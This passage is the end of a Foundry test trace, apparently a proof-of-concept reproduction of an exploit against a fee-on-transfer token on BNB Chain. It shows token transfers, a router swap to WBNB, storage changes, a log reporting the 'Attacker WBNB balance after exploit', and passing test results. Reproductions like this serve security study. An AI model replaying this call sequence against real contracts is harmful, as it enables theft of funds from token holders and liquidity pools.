    │   ├─ emit Transfer(from: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 279771103202807808000 [2.797e20])
    │   ├─  storage changes:
    │   │   @ 0x3386a42d42bcdf15a01409ef82b398361fdc8262391f6935b9f4b7f552f743e6: 0x00000000000000000000000000000000000000000000000f2a9aa01276828000 → 0
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000005acec630ec17742e → 0x00000000000000000000000000000000000000000000000f856966436299f42e
    │   │   @ 0xb3f0bcd3f59c5c58cd7e1f393374933316a9326bbcaeaaf19c9fa3286ef9a490: 0 → 0x00000000000000000000000000000000000000000000000000000000631cd84b
    │   │   @ 0xcdc49e637aab090daaa85eab434d212fa82461b9645970b8cb9110a69106a998: 0x00000000000000000000000000000000000000000000001b1ae4d6e2ef500000 → 0x00000000000000000000000000000000000000000000000bf04a36d078cd8000
    │   │   @ 0xb6dce3adf355cf582e0092cd9712712812666252f651c76c6e04cc921fc547e3: 0x00000000000000000000000000000000000000000000049c7bf26662673710c5 → 0x00000000000000000000000000000000000000000000048d5157c64ff0b490c5
    │   └─ ← [Stop]
    ├─ [1959] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   └─ ← [Return] 286314488424845407278 [2.863e20]
    ├─ [278486] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(286314488424845407278 [2.863e20], 0, [0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, 0x55d398326f99059fF775485246999027B3197955, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1662805963 [1.662e9])
    │   ├─ [192417] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x79cD24Ed4524373aF6e047556018b1440CF04be3, 286314488424845407278 [2.863e20])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, value: 5726289768496908145 [5.726e18])
    │   │   ├─ [18109] 0xfF7A90FA8193b51482c37E84f3E9a0798921380b::getDay(1662834763 [1.662e9]) [delegatecall]
    │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000000a
    │   │   ├─ [18109] 0xfF7A90FA8193b51482c37E84f3E9a0798921380b::getDay(1662834763 [1.662e9]) [delegatecall]
    │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000000a
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, value: 5726289768496908145 [5.726e18])
    │   │   ├─ [18109] 0xfF7A90FA8193b51482c37E84f3E9a0798921380b::getDay(1662834763 [1.662e9]) [delegatecall]
    │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000000a
    │   │   ├─ [18109] 0xfF7A90FA8193b51482c37E84f3E9a0798921380b::getDay(1662834763 [1.662e9]) [delegatecall]
    │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000000a
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x2f72fe7CB8784E6b34a62C1E71c9DF4D8451be02, value: 2863144884248454072 [2.863e18])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x79cD24Ed4524373aF6e047556018b1440CF04be3, value: 271998764003603136914 [2.719e20])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039156889836955530831387 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb6dce3adf355cf582e0092cd9712712812666252f651c76c6e04cc921fc547e3: 0x00000000000000000000000000000000000000000000048d5157c64ff0b490c5 → 0x00000000000000000000000000000000000000000000048df04782b909211fa7
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000f856966436299f42e → 0
    │   │   │   @ 63: 0 → 0x000000000000000000000000000000000000000000000003c0336b8e3c1af92e
    │   │   │   @ 57: 0 → 0x0000000000000000000000000000000000000000000000081266a73b70c5d267
    │   │   │   @ 66: 0x000000000000000000000000000000000000000000000003c0336b8e3c1af92e → 0x0000000000000000000000000000000000000000000000040fab49c2c851409f
    │   │   │   @ 0x9e278f814ad3ffbb7f027bc4ee8baeb253a935b12f796e4956a034ce49bfb589: 0xffffffffffffffffffffffffffffffffffffffffffffffff38711aec5c581a49 → 0xffffffffffffffffffffffffffffffffffffffffffffffefb307b4a8f9be261b
    │   │   │   @ 60: 0x0000000000000000000000000000000000000000000000081266a73b70c5d267 → 0x00000000000000000000000000000000000000000000000861de856ffcfc19d8
    │   │   │   @ 0xb2cf4bf218ab9fe299fe0ba0f19acacf2db690dfdd02872d6ca2eabde0a0b6ec: 0x000000000000000000000000000000000000000000000001e019b5c71e0d7c6a → 0x00000000000000000000000000000000000000000000000207d5a4e16428a022
    │   │   │   @ 58: 9 → 10
    │   │   │   @ 56: 0 → 9
    │   │   │   @ 59: 0x0000000000000000000000000000000000000000000000081266a73b70c5d267 → 0x0000000000000000000000000000000000000000000000004f77de348c364771
    │   │   │   @ 62: 0 → 9
    │   │   │   @ 0x4e01b92225fef21f40abc8866704fec6e4c8f7900892f0badcb87dca392bfc9b: 0x0000000000000000000000000000000000000000000001becfac6374bfeee817 → 0x0000000000000000000000000000000000000000000001cd8e6a1e34c40129a9
    │   │   │   @ 65: 0x000000000000000000000000000000000000000000000003c0336b8e3c1af92e → 0x0000000000000000000000000000000000000000000000004f77de348c364771
    │   │   │   @ 64: 9 → 10
    │   │   └─ ← [Return] true
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [893] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::getReserves() [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23], 8242212301889392797719 [8.242e21], 1662719563 [1.662e9]
    │   ├─ [1959] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 8514211065892995934633 [8.514e21]
    │   ├─ [20673] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::swap(3438096039293129465583 [3.438e21], 0, 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE, 0x)
    │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE, 3438096039293129465583 [3.438e21])
    │   │   │   ├─ emit Transfer(from: 0x79cD24Ed4524373aF6e047556018b1440CF04be3, to: 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE, value: 3438096039293129465583 [3.438e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x4e01b92225fef21f40abc8866704fec6e4c8f7900892f0badcb87dca392bfc9b: 0x0000000000000000000000000000000000000000000016d847baf703ba0e1435 → 0x00000000000000000000000000000000000000000000161de6902317499ff546
    │   │   │   │   @ 0xba08221f8673e7bcd34c1b8c4689a983ae464d35addf83dda4fe5d5546a79b0d: 0x00000000000000000000000000000000000000000042b73fe1ebe293dc94f1ba → 0x00000000000000000000000000000000000000000042b7fa4316b6804d0310a9
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   │   └─ ← [Return] 104443632018878067897670 [1.044e23]
    │   │   ├─ [1959] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   │   └─ ← [Return] 8514211065892995934633 [8.514e21]
    │   │   ├─ emit Sync(reserve0: 104443632018878067897670 [1.044e23], reserve1: 8514211065892995934633 [8.514e21])
    │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 271998764003603136914 [2.719e20], amount0Out: 3438096039293129465583 [3.438e21], amount1Out: 0, to: 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE)
    │   │   ├─  storage changes:
    │   │   │   @ 9: 0x00000000000000000000000000000000494316eeda2e08fbd9a5918bc6cdebf8 → 0x00000000000000000000000000000000630c16975b9070de86202170e745f678
    │   │   │   @ 8: 0x631b164b0000000001becfac6374bfeee8170000000016d847baf703ba0e1435 → 0x631c67cb0000000001cd8e6a1e34c40129a900000000161de6902317499ff546
    │   │   │   @ 10: 0x0000000000000000000000000000000312de614263eabc618b113defeda9d4f9 → 0x000000000000000000000000000000145461cee365223d22ed2ff8f1453635f9
    │   │   └─ ← [Stop]
    │   ├─ [893] 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE::getReserves() [staticcall]
    │   │   └─ ← [Return] 80654475585161717056074170 [8.065e25], 279160001838224320375056 [2.791e23], 1662719563 [1.662e9]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE) [staticcall]
    │   │   └─ ← [Return] 80657913681201010185539753 [8.065e25]
    │   ├─ [48739] 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE::swap(0, 11869629497407785960 [1.186e19], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [23162] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 11869629497407785960 [1.186e19])
    │   │   │   ├─ emit Transfer(from: 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 11869629497407785960 [1.186e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x65a91b743eebb93754974b0d76ae6fbcc9c7843adbbd90f71368692e5c22fe4d: 0x000000000000000000000000000000000000000000003b1d4b451ac932822910 → 0x000000000000000000000000000000000000000000003b1ca68bb5a56204dd28
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000000000000a4b96523d07d4be8
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE) [staticcall]
    │   │   │   └─ ← [Return] 80657913681201010185539753 [8.065e25]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE) [staticcall]
    │   │   │   └─ ← [Return] 279148132208726912589096 [2.791e23]
    │   │   ├─ emit Sync(reserve0: 80657913681201010185539753 [8.065e25], reserve1: 279148132208726912589096 [2.791e23])
    │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 3438096039293129465583 [3.438e21], amount1In: 0, amount0Out: 0, amount1Out: 11869629497407785960 [1.186e19], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 9: 0x00000000000000000000000000000001cdf5082bca6e72775587e9f9d3516fdc → 0x00000000000000000000000000000001cf2014077422b46df64d7cf83ae397dc
    │   │   │   @ 10: 0x000000000000000000000000000407cc9404869ace165762237af282761488fa → 0x0000000000000000000000000004094979fec6d36dd46946a2f7497d2878107a
    │   │   │   @ 8: 0x631b164b000000003b1d4b451ac93282291000000042b73fe1ebe293dc94f1ba → 0x631c67cb000000003b1ca68bb5a56204dd2800000042b7fa4316b6804d0310a9
    │   │   └─ ← [Stop]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 11869629497407785960 [1.186e19]
    │   └─ ← [Stop]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 11869629497407785960 [1.186e19]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker WBNB balance after exploit", val: 11869629497407785960 [1.186e19], decimals: 18)
    ├─  storage changes:
    │   @ 0x002bef3a594ed8de1ee02e2111f5ef42f23e51944ca84d2e6e83bb2c1acb7c7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 0x0072fde0c25a54a99a0517f551c3cabc4c49d9ef3648fd789a3f57d0243cdb90: 0 → 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeff
    │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000001bc16d674ec80000
    │   @ 12: 0 → 1
    │   @ 76: 0x000000000000000000000000000000000000000000000081f90b692fd9b11690 → 0x000000000000000000000000000000000000000000000081f90b692fd9b11687
    │   @ 0xcdc49e637aab090daaa85eab434d212fa82461b9645970b8cb9110a69106a998: 0x00000000000000000000000000000000000000000000001b1ae4d6e2ef500000 → 0x00000000000000000000000000000000000000000000000bf04a36d078cd8000
    │   @ 0x15312214594970a8f023c76c50c6a46b68d655fd2ac0858b55319ab09e80e7ec: 0x0000000000000000000000000000000000000000000000c187b3d55450880000 → 0x0000000000000000000000000000000000000000000000c55325ca7415e00000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 27.68s (25.00s CPU time)

Ran 2 test suites in 29.03s (28.58s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
